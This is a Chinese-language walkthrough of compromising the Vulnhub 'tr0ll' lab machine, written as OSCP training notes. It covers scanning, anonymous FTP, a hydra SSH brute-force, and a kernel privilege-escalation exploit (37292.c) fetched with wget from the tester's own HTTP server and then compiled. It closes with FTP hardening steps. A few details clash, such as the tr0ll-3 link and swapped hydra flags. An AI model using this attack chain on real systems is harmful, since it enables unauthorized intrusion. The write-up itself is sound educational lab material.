渗透Vulnhub-tr0ll靶机
本篇文章旨在为网络安全渗透测试行业靶机教学。通过阅读本文,读者将能够对渗透Vulnhub系列tr0ll靶机有定的了解
一、信息收集阶段
靶机官网:https://www.vulnhub.com/entry/tr0ll-3,340/
因为靶机为本地部署虚拟机网段,查看dhcp地址池设置。得到信息IP为:192.168.60.0/24
1、扫描网段,发现主机
nmap -sP 192.168.60.0/24
2、扫描主机详细信息
nmap -sT -sV -sC 192.168.60.171
#-sT 会尝试与目标主机的每个端口建立完整的 TCP 连接
#-sV 尝试确定每个打开端口上运行的服务的版本
#-sC 使用默认的脚本扫描(Script Scanning)可以帮助发现更多的信息,如漏洞、配置错误等
二、攻击面寻找阶段
1、web页面枚举
dirb http://192.168.60.171
2、ftp匿名登陆
刚才在信息收集阶段通过nmap得知21端口存在ftp匿名登录,这里我们尝试登录
ftp 192.168.60.171
#账号:ftp
#密码:空
3、ftp下载pcap流量包文件
get lol.pcap #ftp下载lol.pcap文件
4、wireshark打开pcap文件过滤数据包
流量分析:
5、下载sup3rs3cr3tdirlol的二进制文件
wget http://192.168.60.171/sup3rs3cr3tdirlol/roflmao
执行一下看看
chmod 777 roflmao
./roflmao
6、海德拉爆破
wget 192.168.60.171/0x0856BF/this_folder_contains_the_password/Pass.txt #下载账号文本
wget 192.168.60.171/0x0856BF/good_luck/which_one_lol.txt #下载密码文本
hydra -L which_one_lol.txt -p Pass.txt 192.168.60.171 ssh -v #指定文件爆破目标ssh
7、ssh登录
ssh overflow@192.168.60.171 #使用overflow登录目标机
uname -a
lsb_release
三、攻击提权阶段
1、查看内核版本历史漏洞
#我们通过uname -a lsb_release查看到系统内核
searchsploit Ubuntu 14.04|grep 3.13.0
2、下载exp文件
searchsploit -m 37292.c
3、kali开启http微服务
python -m http.server 8088
4、ssh靶机下载exp文件
ls -la #查看哪个目录可以写入执行
cd /tmp
wget http://192.168.60.128:8088/37292.c
5、python创建终端
python -c "import pty;pty.spawn('/bin/bash')"
6、编译利用exp文件
gcc -o exp 37292.c #编译利用文件 保存为exp
chmod +x exp #exp文件添加执行权限
./exp #执行提权
四、ftp匿名登录防范措施
1、vsftpd
#打开vsftpd的配置文件,通常位于 /etc/vsftpd/vsftpd.conf 或 /etc/vsftpd.conf。
anonymous_enable=NO #找到配置文件把值改成NO
sudo systemctl restart vsftpd #重启vsftpd服务
2、ProFTPD
#打开ProFTPD的配置文件,通常位于 /etc/proftpd/proftpd.conf 或 /etc/proftpd.conf
<Anonymous ~ftp> #整行注释掉
sudo systemctl restart proftpd #重启proftpd服务
声明! 学习内容来自B站up主 泷羽sec的OSCP考证培训课程有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!